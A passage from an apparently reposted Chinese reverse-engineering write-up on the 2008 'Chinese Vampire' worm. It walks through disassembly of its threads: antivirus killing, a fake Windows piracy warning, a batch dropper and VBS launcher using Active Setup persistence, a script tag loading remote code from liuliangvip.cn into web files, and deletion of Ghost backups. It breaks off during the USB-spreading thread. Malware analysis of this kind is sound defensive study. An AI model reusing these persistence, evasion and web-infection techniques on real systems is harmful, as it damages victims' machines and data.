病毒分析之中华吸血鬼

PS:出自之前收藏的文章,中华吸血鬼这个病毒已经是08年的,距今已经有4年之久,不过很多分析还是值得学习和借鉴的。

“中华吸血鬼”是个蠕虫病毒,病毒通过U盘、局域网弱密码猜解、网页挂马、dll劫持等方式传播。该病毒会在%systemroot%/Tasks/ 中释放多个病毒文件,通过修改注册表键值实现开机自动启动;为了躲避杀毒软件查杀,该病毒还会关闭、破坏多种主流杀毒软件和安全工具,并且会屏蔽常见安全网站。病毒会每隔360000ms(约6分钟)下载一次新病毒到本地运行,达到其不断更新的目的,还会删除Windows目录中help下的所有文件。电脑一旦感染此病毒,可能会给系统带来很大安全威胁。带着学习和过招的态度,我找到了吸血鬼2.1病毒样本,并对它探个究竟。

首先用PEiD对病毒样本unpacked.exe查壳,发现该病毒没有加壳,如图所示:


用OD载入,单步执行,直到OEP(原始入口点)处。

00405FF8    call 00402E20
按F7跟进,进入病毒程序的初始化代码。病毒首先创建一个名称为“中华吸血鬼2.1”的互斥量;这个固定的互斥量名可以作为识别该样本的一个特征。

00402E20    push    ebx
00402E21    push    esi
00402E22    push    edi
00402E23    push    00401F14 ;中华吸血鬼2.1
00402E28    xor     esi, esi
00402E2A    push    1
00402E2C    push    esi      
00402E2D    call    dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA
然后病毒调用RegDeleteKeyA函数删除HKEY_CURRENT_USER(hKey=80000001)下的注册表键SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK},如下:

00402E4F    push ebp
00402E50    push 00401EA8                         ; /Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00402E55    push 80000001                         ; |hKey = HKEY_CURRENT_USER
00402E5A    call dword ptr [<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA
接下来病毒开始露出它最恶毒的面目,创建15个线程来完成各种恶意破坏。这是本篇文章的核心部分,下面就一个线程一个线程地分析病毒所使用的“十八般武艺”。


线程一:00403278处

创建一个进程快照:
00403290    mov     esi, 00401FF0                    ;  ASCII "360tray.exe"
00403295    lea     edi, dword ptr [ebp-20]         
00403298    mov     dword ptr [ebp-C], eax
0040329B    mov     eax, dword ptr [402000]
004032A0    push    0                                ; /ProcessID = 0
004032A2    movs    dword ptr es:[edi], dword ptr [e>; |
004032A3    mov     dword ptr [ebp-8], eax           ; |
004032A6    mov     eax, dword ptr [401FE8]          ; |
004032AB    movs    dword ptr es:[edi], dword ptr [e>; |
004032AC    mov     dword ptr [ebp-14], eax          ; |
004032AF    mov     eax, dword ptr [401FEC]          ; |
004032B4    push    2                                ; |Flags = TH32CS_SNAPPROCESS
004032B6    mov     dword ptr [ebp-10], eax          ; |
004032B9    movs    dword ptr es:[edi], dword ptr [e>; |
004032BA    call    <jmp.&KERNEL32.CreateToolhelp32S>; \CreateToolhelp32Snapshot

得到快照句柄后,调用Process32First和Process32Next函数遍历进程:
004032CE    mov     edi, eax
004032D0    push    edi                              ; /lppe
004032D1    push    dword ptr [ebp-4]                ; |hSnapshot
004032D4    mov     dword ptr [edi], esi             ; |
004032D6    call    <jmp.&KERNEL32.Process32First>   ; \Process32First
004032DB    push    edi                              ; /lppe
004032DC    push    dword ptr [ebp-4]                ; |hSnapshot
004032DF    call    <jmp.&KERNEL32.Process32Next>    ; \Process32Next

将得到的进程名与360tray.exe、ast.exe、AST.exe进行比较,当匹配时调用TerminateProcess来结束程序。


线程二:004030B6处

获取Windows目录(GetWindowsDirectoryA)以及病毒自身的完整路径(GetModuleFileNameA):
00403134    push    esi                                          ; /BufSize => 104 (260.)
00403135    push    eax                                          ; |Buffer
00403136    call    dword ptr [<&KERNEL32.GetWindowsDirectoryA>] ; \GetWindowsDirectoryA
0040313C    lea     eax, dword ptr [ebp-30C]
00403142    push    esi                                          ; /BufSize => 104 (260.)
00403143    push    eax                                          ; |PathBuffer
00403144    push    0                                            ; |hModule = NULL
00403146    call    dword ptr [<&KERNEL32.GetModuleFileNameA>]   ; \GetModuleFileNameA

之后调用子函数00403043,功能是以"rb"/"wb"模式分别打开病毒自身和目标文件,逐字节fread/fwrite,把病毒文件复制为C:\WINDOWS\Tasks\csrss.exe。注意该文件只是借用了系统进程csrss.exe的名字,真正的csrss.exe位于system32目录下,这种路径差异可用于识别。
00403043    push    ebp
......
0040304E    push    00401F90                    ; /mode = "rb"
00403053    push    dword ptr [ebp+8]           ; |path = "C:\Documents and Settings\li\中华吸血鬼2.2\unpacked.exe"
00403056    call    <jmp.&MSVCRT.fopen>         ; \fopen
0040305B    mov     esi, eax
0040305D    pop     ecx
0040305E    test    esi, esi
00403060    pop     ecx
00403061    je      short 004030B2
00403063    push    00401F8C                    ; /mode = "wb"
00403068    push    dword ptr [ebp+C]           ; |path = "C:\WINDOWS\Tasks\csrss.exe"
0040306B    call    <jmp.&MSVCRT.fopen>         ; \fopen
00403070    mov     ebx, eax
00403072    pop     ecx
00403073    test    ebx, ebx
00403075    pop     ecx
00403076    je      short 004030B2
00403078    test    byte ptr [esi+C], 10
0040307C    push    esi                        ; /stream=MSVCT.77C2FCE0
0040307D    jnz     short 004030A5             ; |
0040307F    push    1                          ; |n = 1
00403081    lea     eax, dword ptr [ebp-104]   ; |eax=00EEF778
00403087    push    1                          ; |size = 1
00403089    push    eax                        ; |ptr
0040308A    call    <jmp.&MSVCRT.fread>        ; \fread
0040308F    push    ebx                        ; /stream
00403090    push    1                          ; |n = 1
00403092    lea     eax, dword ptr [ebp-104]   ; |
00403098    push    1                          ; |size = 1
0040309A    push    eax                        ; |ptr
0040309B    call    <jmp.&MSVCRT.fwrite>       ; \fwrite
004030A0    add     esp, 20
004030A3    jmp     short 00403078
004030A5    call    <jmp.&MSVCRT.fclose>        ; \fclose
004030AA    push    ebx                         ; /stream
004030AB    call    <jmp.&MSVCRT.fclose>        ; \fclose

得到路径后,病毒在C盘根目录创建killme.bat批处理(fopen的path参数为"c:\killme.bat",并非系统目录),并用sprintf拼出如下内容写入:
00403212    push    00401FBC                    ; /mode = "w"
00403217    push    00401FC4                    ; |path = "c:\killme.bat"
0040321C    call    <jmp.&MSVCRT.fopen>         ; \fopen
00403221    mov     esi, eax
00403223    lea     eax, dword ptr [ebp-410]
00403229    push    eax                         ; /<%s>
0040322A    lea     eax, dword ptr [ebp-30C]    ; |
00403230    push    eax                         ; |<%s>
00403231    lea     eax, dword ptr [ebp-71C]    ; |
00403237    push    00401F94                    ; |format = "ipconfig",CR,LF,"del ""%s""",CR,LF,"start %s",CR,LF,"del %%0"
0040323C    push    eax                         ; |s
0040323D    call    <jmp.&MSVCRT.sprintf>       ; \sprintf
00403242    lea     eax, dword ptr [ebp-71C]
00403248    push    esi                         ; /stream
00403249    push    eax                         ; |s
0040324A    call    <jmp.&MSVCRT.fputs>         ; \fputs
0040324F    push    esi                         ; /stream
00403250    call    <jmp.&MSVCRT.fclose>        ; \fclose

Killme.bat内容:
ipconfig
del "C:\Documents and Settings\li\桌面\中华吸血鬼2.2\unpacked.exe"
start C:\WINDOWS\Tasks\csrss.exe
del %0
调用WinExec隐蔽执行killme.bat:先删除原始的unpacked.exe,再启动释放到Tasks目录下的csrss.exe,最后用del %0删除批处理自身以清除痕迹。Tasks目录下的csrss.exe再配合后文线程五写入的Active Setup注册表项,达到开机自启动的目的。


线程三:004033AC处

跳到004033AC处,首先获得PostMessageA的地址,然后调用Sleep函数休眠3s。接下来调用GetCursorPos获得光标所在位置的坐标,接着调用WindowFromPoint来获得光标坐标的窗口句柄。
004033FA    push    eax                              ; /pPoint  存取坐标的结构体
004033FB    call    dword ptr [<&USER32.GetCursorPos>; \GetCursorPos
00403401    push    dword ptr [ebp-8]                ; /pt.Y
00403404    push    dword ptr [ebp-C]                ; |pt.X
00403407    call    dword ptr [<&USER32.WindowFromPo>; \WindowFromPoint

接下来调用GetWindowTextA函数来获取窗口标题
00403447    push    104                                          ; /Count = 104 (260.)
0040344C    push    eax                                          ; |Buffer
0040344D    push    edi                                          ; |hWnd
0040344E    call    dword ptr [<&USER32.GetWindowTextA>]         ; \GetWindowTextA

如果桌面上窗口标题是: 杀毒、worm、卡巴斯基、超级巡警、江民、金山、Anti、
Anti、Virus、virus、Firewall、检测、Mcafee.、病毒、查杀、狙剑、防火墙、主动防御、微点、防御、系统保护、绿鹰、木马、上报、举报、瑞星、进程、系统安全、Process.、NOD32、专杀安全卫士,
00403490    push    004021E0                         ; /s2 = "NOD32"
00403495    push    eax                              ; |s1
00403496    call    <jmp.&MSVCRT.strstr>             ; \strstr

如果是就结束掉,结束不掉的话就一直弹出一个警告,直到这些软件被关掉。该警告伪装成微软的“windows盗版验证”提示,声称用户正在使用的安全软件是盗版,属于典型的社会工程手段,目的是诱导用户自己关闭安全软件。
004037CE    push    eax                              ; /<%s>
004037CF    lea     eax, dword ptr [ebp-110]         ; |
004037D5    push    eax                              ; |<%s>
004037D6    lea     eax, dword ptr [ebp-318]         ; |
004037DC    push    00402014                         ; |format = 安全提示:您正在使用的%s%s是盗版软件,可能您是盗版软件的受害者,为了给用户提供保证,我们无法继续给您提供服务,请到指定销售商店购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com

004037E1    push    eax                              ; |s
004037E2    call    <jmp.&MSVCRT.sprintf>            ; \sprintf
004037E7    add     esp, 10
004037EA    lea     eax, dword ptr [ebp-318]
004037F0    push    10                               ; /Style = MB_OK|MB_ICONHAND|MB_APPLMODAL
004037F2    push    00402004                         ; |Title = "windows盗版验证"
004037F7    push    eax                              ; |Text
004037F8    push    ebx                              ; |hOwner
004037F9    call    dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA


线程四:00405E10处

跳到00405E10处,此处是一小段数据,在00405E3C处才是代码。原来这个线程是用来专门对抗冰刃(IceSword)的:先通过GetForegroundWindow得到前台窗口的句柄,再用FindWindowExA在该窗口中查找类名为AfxControlBar42s的子窗口
00405E43    call    esi                              ; [GetForegroundWindow;返回前台窗口的句柄
00405E45    push    dword ptr [ebp+C]                ; /Title = "";窗口标题
00405E48    xor     ebx, ebx                         ; |
00405E4A    mov     edi, eax                         ; |保存窗口句柄
00405E4C    push    dword ptr [ebp+8]                ; |Class = "AfxControlBar42s";指定类名
00405E4F    push    ebx                              ; |hAfterWnd => NULL;子窗口句柄
00405E50    push    edi                              ; |hParent;父窗口句柄
00405E51    call    dword ptr [<&USER32.FindWindowEx>; \FindWindowExA;获取一个窗口的句柄

发现标题是跟冰刃有关的,就调用PostMessageA发送WM_CLOSE来结束冰刃。
00405E5B    push    ebx                                              ; /lParam => 0
00405E5C    push    ebx                                              ; |wParam => 0
00405E5D    push    10                                               ; |Message = WM_CLOSE
00405E5F    push    edi                                              ; |hWnd
00405E60    call    dword ptr [<&USER32.PostMessageA>]               ; \PostMessageA

仅仅发送WM_CLOSE是不能结束掉冰刃的,冰刃会弹出一个是否结束冰刃的对话框。于是病毒就采用下面的方法来模拟按键Enter。
00405E9B    push    ebx                                              ; /ExtraInfo => 0
00405E9C    push    ebx                                              ; |Flags => 0
00405E9D    push    ebx                                              ; |ScanCode => 0
00405E9E    push    0D                                               ; |Key = VK_RETURN ;Enter键相关的击键值
00405EA0    call    dword ptr [<&USER32.keybd_event>]                ; \keybd_event

该方法比较新颖,使用keybd_event模拟Enter键并结束掉冰刃,值得学习。从防御角度看,这也提醒安全工具的确认对话框不应把“确认退出”设为默认按钮,否则一次模拟击键就能绕过确认。


线程五:00405CE0处

删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键(该键存放WSH的启用/禁用等设置,推测是为了确保后面释放的vbs脚本能够执行),以及HKCU(hKey=80000001)下的SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}键:
00405D1D    push    00402D1C                         ;  ASCII"SOFTWARE\Microsoft\Windows Script Host\Settings"
00405D22    rep     stos dword ptr es:[edi]
00405D24    push    esi  
00405D25    call    ebx                             ;  ADVAPI32.RegDeleteKeyA
00405D27    mov     edi, 00401EA8                    ;  ASCII "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00405D2C    push    edi
00405D2D    push    80000001
00405D32    call    ebx                              ;  ADVAPI32.RegDeleteKeyA

然后又在HKEY_LOCAL_MACHINE下创建SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}键,默认值设为“系统设置”,StubPath(REG_EXPAND_SZ)设为%windir%\Tasks\hackshen.vbs。Active Setup机制会在用户登录时执行HKLM组件项中的StubPath命令,并在HKCU下记录已执行过的组件;前面先删除HKCU下的同名键,正是为了让这个StubPath在下次登录时重新运行,从而实现持久化。
00405D37    push    eax                              ; /pHandle = 010EFFB0
00405D38    push    edi                              ; |Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00405D39    push    esi                              ; |hKey = HKEY_LOCAL_MACHINE
00405D3A    call    dword ptr [<&ADVAPI32.RegCreateK>; \RegCreateKeyA
00405D40    mov     edx, 00402D10
00405D45    or      ecx, FFFFFFFF
00405D48    mov     edi, edx
00405D4A    xor     eax, eax
00405D4C    repne   scas byte ptr es:[edi]
00405D4E    not     ecx
00405D50    dec     ecx
00405D51    push    ecx                              ; /Length=8
00405D52    push    edx                              ; |Value => "系统设置"
00405D53    push    1                                ; |ValueType = REG_SZ
00405D55    push    eax                              ; |Subkey => NULL
00405D56    push    dword ptr [ebp-4]                ; |hKey=64
00405D59    call    dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueA设置键值
00405D5F    lea     eax, dword ptr [ebp-104]
00405D65    push    eax                              ; /String
00405D66    call    dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
00405D6C    push    eax                              ; /BufSize=27
00405D6D    lea     eax, dword ptr [ebp-104]         ; |
00405D73    push    eax                              ; |Buffer= 	
00405D74    push    2                                ; |ValueType = REG_EXPAND_SZ
00405D76    push    0                                ; |Reserved = 0
00405D78    push    00402D04                         ; |ValueName = "stubpath"
00405D7D    push    dword ptr [ebp-4]                ; |hKey=64
00405D80    call    dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA
00405D86    push    dword ptr [ebp-4]                ; /hKey
00405D89    call    dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00405D8F    lea     eax, dword ptr [ebp-208]
00405D95    push    104                              ; /BufSize = 104 (260.)
00405D9A    push    eax                              ; |Buffer
00405D9B    call    dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA获取系统目录
00405DA1    mov     edi, 00402CF0                    ;  ASCII "\Tasks\hackshen.vbs"
00405DA6    or      ecx, FFFFFFFF
00405DA9    xor     eax, eax                           ;清零,用于计算字符串长度
00405DAB    lea     edx, dword ptr [ebp-208]
00405DB1    repne   scas byte ptr es:[edi]                 ;扫描字符串知道匹配eax=0时停止
00405DB3    not     ecx                              ;得到字符串的长度
00405DB5    sub     edi, ecx
00405DB7    push    00401FBC                         ; /mode = "w"
00405DBC    mov     esi, edi                         ; |esi指向ASCII "\Tasks\hackshen.vbs"
00405DBE    mov     edi, edx                        ; |edi指向 ASCII"C:\Windows"
00405DC0    mov     edx, ecx                         ; |将字符串长度保存
00405DC2    or      ecx, FFFFFFFF                    ; |ecx=FFFFFFFF
00405DC5    repne   scas byte ptr es:[edi]           ; |扫描字符串知道匹配eax=0时停止
00405DC7    mov     ecx, edx                         ; |将字符串长度回写
00405DC9    dec     edi                              ; |
00405DCA    shr     ecx, 2                           ; |字符串长度除4
00405DCD    rep     movs dword ptr es:[edi], dword ptr es:[esi]>; |按双字将esi所指的内容移到edi所指的地址后,即将ASCII "\Tasks\hackshen.vbs"移到ASCII"C:\Windows"后
00405DCF    mov     ecx, edx                         ; |
00405DD1    lea     eax, dword ptr [ebp-208]         ; |
00405DD7    and     ecx, 3                           ; |ecx清零
00405DDA    push    eax                              ; |path = "C:\WINDOWS\Tasks\hackshen.vbs"
00405DDB    rep     movs byte ptr es:[edi], byte ptr>; |
00405DDD    call    <jmp.&MSVCRT.fopen>              ; \fopen
00405DE4    push    00402C8C                         ; /format = "On Error Resume Next",CR,LF,"Set rs=createObject(""Wscript.shell"")",CR,LF,"rs.run ""%%windir%%\Tasks\csrss.exe"",0"
00405DE9    lea     eax, dword ptr [ebp-30C]         ; |
00405DEF    push    eax                              ; |s
00405DF0    call    <jmp.&MSVCRT.sprintf>            ; \sprintf
00405DF5    lea     eax, dword ptr [ebp-30C]
00405DFB    push    esi                              ; /stream
00405DFC    push    eax                              ; |s
00405DFD    call    <jmp.&MSVCRT.fputs>              ; \fputs
00405E02    push    esi                              ; /stream
00405E03    call    <jmp.&MSVCRT.fclose>             ; \fclose
生成的vbs内容如下(sprintf会把格式串中的%%还原为单个%,末尾的,0参数使csrss.exe以隐藏窗口方式启动):
On Error Resume Next
Set rs=createObject("Wscript.shell")
rs.run "%windir%\Tasks\csrss.exe",0


线程六:00403BC5处

每隔2s创建一个线程,线程函数指向00403B92处。线程函数先创建一个名为HDM的互斥量,若GetLastError返回0B7(ERROR_ALREADY_EXISTS)则直接返回,保证同一时间只有一个实例在执行后续逻辑;否则调用004039AC子函数。
00403BC5    push    esi
00403BC6    xor     esi, esi
00403BC8    push    7D0                                       ; /Timeout = 2000. ms
00403BCD    call    dword ptr [<&KERNEL32.Sleep>]             ; \Sleep休眠两秒
00403BD3    push    esi                                       ; /pThreadId=NULL
00403BD4    push    esi                                       ; |CreationFlags=0
00403BD5    push    esi                                       ; |pThreadParm=NULL
00403BD6    push    00403B92                                  ; |ThreadFunction = unpacked.00403B92
00403BDB    push    esi                                       ; |StackSize=0
00403BDC    push    esi                                       ; |pSecurity=NULL
00403BDD    call    dword ptr [<&KERNEL32.CreateThread>]      ; \CreateThread创建一个线程
线程函数:
00403B92    push    00402204                                  ; /MutexName = "HDM"
00403B97    push    1                                         ; |InitialOwner = TRUE
00403B99    push    0                                         ; |pSecurity = NULL
00403B9B    call    dword ptr [<&KERNEL32.CreateMutexA>]      ; \CreateMutexA
00403BA1    call    dword ptr [<&KERNEL32.GetLastError>]      ; [GetLastError
00403BA7    cmp     eax, 0B7
00403BAC    jnz     short 00403BB3
00403BAE    xor     eax, eax
00403BB0    retn    4

004039B5    push    ebx
004039B6    push    esi
004039B7    push    edi
004039B8    call    00403804      ;获取#32770类名的窗口句柄
004039BD    mov     esi, dword ptr [<&USER32.IsWindow>]   ;  USER32.IsWindow确定给定的窗口句柄是否标识一个已存在的窗口
004039C3    mov     edi, eax
004039C5    push    edi                                   ; /hWnd
004039C6    call    esi                                   ; \IsWindow
004039D0    push    edi
004039D1    call    00403900               ;列举子窗口
{
  00403900    push    50011004
  00403905    push    37E
  0040390A    push    dword ptr [esp+C]
  0040390E    call    004038CF
  {
   ......
   004038EA    push    eax                                   ; /lParam
   004038EB    push    00403898                              ; |Callback = unpacked.00403898
   004038F0    push    dword ptr [ebp+8]                     ; |hParent
   004038F3    call    dword ptr [<&USER32.EnumChildWindows>>; \EnumChildWindows枚举一个父窗口的所有子窗口
   004038F9    mov     eax, dword ptr [406060]
   004038FE    leave
   004038FF    retn
  }
  00403913    add     esp, 0C
  00403916    retn
}
......
00403AF1    push    -1                                    ; /lParam = FFFFFFFF
00403AF3    mov     edi, 0B1                              ; |
00403AF8    push    ebx                                   ; |wParam
00403AF9    push    edi                                   ; |Message => EM_SETSEL
00403AFA    push    dword ptr [ebp-4]                     ; |hWnd
00403AFD    call    esi                                   ; \SendMessageA
......
00403B81    push    ebx                                   ; /lParam
00403B82    push    ebx                                   ; |wParam
00403B83    push    0C2                                   ; |Message = EM_REPLACESEL
00403B88    push    dword ptr [ebp-4]                     ; |hWnd
00403B8B    call    esi                                   ; \SendMessageA
该例程查找类名为#32770(Windows标准对话框类)的窗口,枚举其子窗口,并向编辑控件发送EM_SETSEL、EM_REPLACESEL消息写入文本,试图向对方发送消息(具体消息内容没有试验出来,推测是借助QQ之类的聊天工具传播)。


线程七:00403FBA处

调用GetLogicalDriveStringsA函数获取一个字串,其中包含了当前所有逻辑驱动器的根路径;跳过A:和C:两个盘符(见下面的lstrcmpA比较),对其余盘符(通常即从D盘开始)调用FindFirstFileA和FindNextFileA循环查找文件。
00403FEF    push    eax                                          ; /Buffer = 012EFEB0
00403FF0    push    100                                          ; |BufSize = 100 (256.)
00403FF5    call    dword ptr [<&KERNEL32.GetLogicalDriveStrings>; \GetLogicalDriveStringsA
00403FFB    mov     ebx, eax          ;返回值保存到ebx,调用成功保存得到字符串的长度
00403FFD    xor     esi, esi             ;esi清零
00403FFF    test    ebx, ebx            ;测试返回值
00404001    jle     short 00404054        ;如果为0,即不成功,退出
00404003    mov     edi, dword ptr [<&KERNEL32.lstrc>;  kernel32.lstrcmpA
00404009    cmp     byte ptr [ebp+esi-104], 0       ;比较是否为空来得到驱动器盘符
00404011    jnz     short 0040404F
00404013    mov     al, byte ptr [ebp+esi-107]          ;将A赋值给al
0040401A    push    00402264                        ;  ASCII "A:"
0040401F    mov     byte ptr [ebp-4], al                ;将A保存
00404022    mov     al, byte ptr [ebp+esi-106]          ;将:赋值给al
00404029    mov     byte ptr [ebp-3], al                ;将:添加到A后
0040402C    lea     eax, dword ptr [ebp-4]              
0040402F    push    eax
00404030    call    edi                            ;lstrcmpA比较是否为A:
00404032    test    eax, eax                         ;测试返回值
00404034    je      short 0040404F                   ;是的话继续获取后面的驱动器盘符
00404036    lea     eax, dword ptr [ebp-4]             ;不是的话和C:进行比较
00404039    push    00402260                        ;  ASCII "C:"
0040403E    push    eax
0040403F    call    edi                             ;lstrcmpA
00404041    test    eax, eax                          ;测试返回值
00404043    je      short 0040404F                    ;相等的话继续获取后面的驱动器盘符
00404045    lea     eax, dword ptr [ebp-4]              ;不相等的话开始调用子函数
00404048    push    eax
00404049    call    00403C13
{   
   00403C13    push    ebp
   ......   
   00403C33    push    dword ptr [ebp+8]                ; /String2=D:
   00403C36    mov     ebx, dword ptr [<&KERNEL32.lstrc>; |kernel32.lstrcpyA
   00403C3C    stos    word ptr es:[edi]                ; |
   00403C3E    stos    byte ptr es:[edi]                ; |
   00403C3F    lea     eax, dword ptr [ebp-34C]         ; |
   00403C45    push    eax                              ; |String1
   00403C46    call    ebx                              ; \lstrcpyA
   00403C48    mov     esi, dword ptr [<&KERNEL32.lstrc>;  kernel32.lstrcatA
   00403C4E    lea     eax, dword ptr [ebp-34C]
   00403C54    push    0040224C                         ; /StringToAdd = "\*.*"   通配符
   00403C59    push    eax                              ; |ConcatString=D:
   00403C5A    call    esi                              ; \lstrcatA连接字符串
   ......
   00403C62    push    eax                                          ; /pFindFileData
   00403C63    lea     eax, dword ptr [ebp-34C]                     ; |
   00403C69    push    eax                                          ; |FileName=D:\*.*
   00403C6A    call    dword ptr [<&KERNEL32.FindFirstFileA>]       ; \FindFirstFileA
   00403C70    cmp     eax, -1
   00403C73    mov     dword ptr [ebp-4], eax
   00403C76    jnz     short 00403C7F
   00403C78    xor     eax, eax
   00403C7A    jmp     00403EC3
   00403C7F    lea     ecx, dword ptr [ebp-248]
   00403C85    push    ecx                                          ; /pFindFileData
   00403C86    push    eax                                          ; |hFile
   00403C87    call    dword ptr [<&KERNEL32.FindNextFileA>]        ; \FindNextFileA

其中调用403BE5和403BFC两个子函数,都是提取文件名后缀的函数。以403BFC为例,它先用repne scas计算字符串长度,然后返回指向末尾4个字符的指针(如“.BIN”);403BE5推测用于取末尾5个字符,以匹配html、aspx这类四字母后缀。
00403BFC    mov     edx, dword ptr [esp+4]
00403C00    push    edi                              ;  lstrcmpA
00403C01    mov     edi, edx                         ;  D:\BOOTFONT.BIN
00403C03    or      ecx, FFFFFFFF                    ;ecx=FFFFFFFF
00403C06    xor     eax, eax                          ;eax清零
00403C08    repne   scas byte ptr es:[edi]                ;扫描字符串直到遇到空为止
00403C0A    not     ecx                             ;得到字符串的长度
00403C0C    dec     ecx
00403C0D    pop     edi                              ;lstrcmpA
00403C0E    lea     eax, dword ptr [ecx+edx-4]           ;.BIN
00403C12    retn

如果后缀名是html,HTML,htm,HTM,asp,aspx,php,jsp的话,就向文件写入"<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>",这样每次用浏览器打开这些网页文件时,都会自动加载http://www.liuliangvip.cn/down/index.htm上的远程脚本(即网页挂马)。如果不是的话就检查后缀名是否为gho,GHO,Gho,是的话就删除掉,使用户不能通过ghost备份文件来恢复系统,这招够毒的。



线程八:00404241处

有两处调用:0040405E和0040422A
00404241   .  E8 18FEFFFF   call    0040405E
00404246   .  E8 DFFFFFFF   call    0040422A
0040424B   .  33C0          xor     eax, eax
0040424D   .  C2 0400       retn    4
0040405E:调用GetModuleFileNameA获得病毒自身(当前模块)的完整路径,保存到全局缓冲区0040760C中,供后面CopyFileA使用
0040405E  /$  68 04010000   push    104                              ; /BufSize = 104 (260.)
00404063  |.  68 0C764000   push    0040760C                         ; |PathBuffer = unpacked.0040760C
00404068  |.  6A 00         push    0                                ; |hModule = NULL
0040406A  |.  FF15 20104000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00404070  \.  C3            retn
查看数据面板,可以看到路径,
 
0040422A:循环调用00404071,直到其返回非零值;每次返回0就先休眠1s再重试
0040422A  /$  E8 42FEFFFF   /call    00404071
0040422F  |.  85C0          |test    eax, eax
00404231  |.  75 0D         |jnz     short 00404240
00404233  |.  68 E8030000   |push    3E8                             ; /Timeout = 1000. ms
00404238  |.  FF15 AC104000 |call    dword ptr [<&KERNEL32.Sleep>]   ; \Sleep休眠1s
0040423E  |.^ EB EA         \jmp     short 0040422A
00404240  \>  C3            retn
00404071:调用GetLogicalDrives,再对每个盘符调用GetDriveTypeA获得逻辑驱动器的类型,并与2(DRIVE_REMOVABLE)比较以筛选可移动磁盘,
004040BC  |.  53            |push    ebx                             ; /RootPathName=C:\
004040BD  |.  8BF7          |mov     esi, edi                        ; |
004040BF  |.  8BD1          |mov     edx, ecx                        ; |
004040C1  |.  8BFB          |mov     edi, ebx                        ; |
004040C3  |.  83C9 FF       |or      ecx, FFFFFFFF                   ; |
004040C6  |.  F2:AE         |repne   scas byte ptr es:[edi]          ; |
004040C8  |.  8BCA          |mov     ecx, edx                        ; |
004040CA  |.  4F            |dec     edi                             ; |
004040CB  |.  C1E9 02       |shr     ecx, 2                          ; |
004040CE  |.  F3:A5         |rep     movs dword ptr es:[edi], dword >; |
004040D0  |.  8BCA          |mov     ecx, edx                        ; |
004040D2  |.  83E1 03       |and     ecx, 3                          ; |
004040D5  |.  F3:A4         |rep     movs byte ptr es:[edi], byte pt>; |
004040D7  |.  FF15 50104000 |call    dword ptr [<&KERNEL32.GetDriveT>; \GetDriveTypeA获取盘符属性
004040DD  |.  83F8 02       |cmp     eax, 2               ;比较是否为可移动磁盘
004040E0      74 14         jne      short 004040F6       ;不是的话继续查看后面的盘符
004040E2  |.  33C0          |xor     eax, eax
004040E4  |.  50            |push    eax                             ; /pFileSystemNameSize => NULL
004040E5  |.  50            |push    eax                             ; |pFileSystemNameBuffer => NULL
004040E6  |.  50            |push    eax                             ; |pFileSystemFlags => NULL
004040E7  |.  50            |push    eax                             ; |pMaxFilenameLength => NULL
004040E8  |.  50            |push    eax                             ; |pVolumeSerialNumber => NULL
004040E9  |.  50            |push    eax                             ; |MaxVolumeNameSize => 0
004040EA  |.  50            |push    eax                             ; |VolumeNameBuffer => NULL
004040EB  |.  53            |push    ebx                             ; |RootPathName=C:\
004040EC  |.  FF15 4C104000 |call    dword ptr [<&KERNEL32.GetVolume>; \GetVolumeInformationA获取磁盘信息

如果是可移动磁盘的话,又调用00404164和004042E6两个子例程
00404164::
......
0040416D  |.  6A 00         push    0                                ; /timer = NULL
0040416F  |.  E8 9A1D0000   call    <jmp.&MSVCRT.time>               ; \time
00404174  |.  50            push    eax                              ; /seed
00404175  |.  E8 8E1D0000   call    <jmp.&MSVCRT.srand>              ; \srand设置时间因子
0040417A  |.  8065 F4 00    and     byte ptr [ebp-C], 0
0040417E  |.  33C0          xor     eax, eax
00404180  |.  8D7D F5       lea     edi, dword ptr [ebp-B]
00404183  |.  59            pop     ecx
00404184  |.  AB            stos    dword ptr es:[edi]
00404185  |.  AB            stos    dword ptr es:[edi]
00404186  |.  59            pop     ecx
00404187  |.  33F6          xor     esi, esi
00404189  |.  66:AB         stos    word ptr es:[edi]
0040418B  |>  E8 721D0000   /call    <jmp.&MSVCRT.rand>              ; [rand产生随机数
00404190  |.  6A 3E         |push    3E
00404192  |.  33D2          |xor     edx, edx
00404194  |.  59            |pop     ecx
00404195  |.  F7F1          |div     ecx
00404197  |.  46            |inc     esi
00404198  |.  83FE 0A       |cmp     esi, 0A                            ;重复10次
0040419B  |.  8A82 902D4000 |mov     al, byte ptr [edx+402D90]
004041A1  |.  884435 F3     |mov     byte ptr [ebp+esi-D], al
004041A5  |.^ 7C E4         \jl      short 0040418B
......
